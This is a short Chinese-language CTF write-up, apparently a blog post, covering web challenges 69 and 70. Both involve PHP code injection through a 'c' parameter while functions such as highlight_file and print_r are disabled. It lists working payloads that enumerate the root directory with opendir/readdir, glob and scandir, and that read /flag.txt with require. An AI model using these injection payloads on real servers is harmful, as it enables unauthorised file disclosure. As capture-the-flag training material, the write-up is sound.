web69-web70笔记（highlight_file()还是没了var_dump居然也没了）

web69

Warning: highlight_file() has been disabled for security reasons in /var/www/html/index.php on line 19

highlight_file()还是没了var_dump居然也没了

虽然payload还是 c=require("/flag.txt");

于是去找⼀下可以读取⽬录的⽅式,我百度了114514/19198秒，没找到，于是就cv南神的了

print_r(glob("*")); // 列当前⽬录

print_r(glob("/*")); // 列根⽬录

print_r(scandir("."));

print_r(scandir("/"));

$d=opendir(".");while(false!==($f=readdir($d))){echo"$f\n";}

$d=dir(".");while(false!==($f=$d->read())){echo$f."\n";}

$a=glob("/*");foreach($a as $value){echo $value." ";}

$a=new DirectoryIterator('glob:///*');foreach($a as $f){echo($f->__toString()." ");}

这⾥是过滤了print_r所以⽤后⾯的

c=$d=opendir("/");while(false!==($f=readdir($d))){echo"$f\n";}

 

 

web70

Warning: error_reporting() has been disabled for security reasons in /var/www/html/index.php on line 14

Warning: ini_set() has been disabled for security reasons in /var/www/html/index.php on line 15

Warning: highlight_file() has been disabled for security reasons in /var/www/html/index.php on line 21 你要上天吗？

继续这个：

c=$d=opendir("/");while(false!==($f=readdir($d))){echo"$f\n";}

c=require("/flag.txt");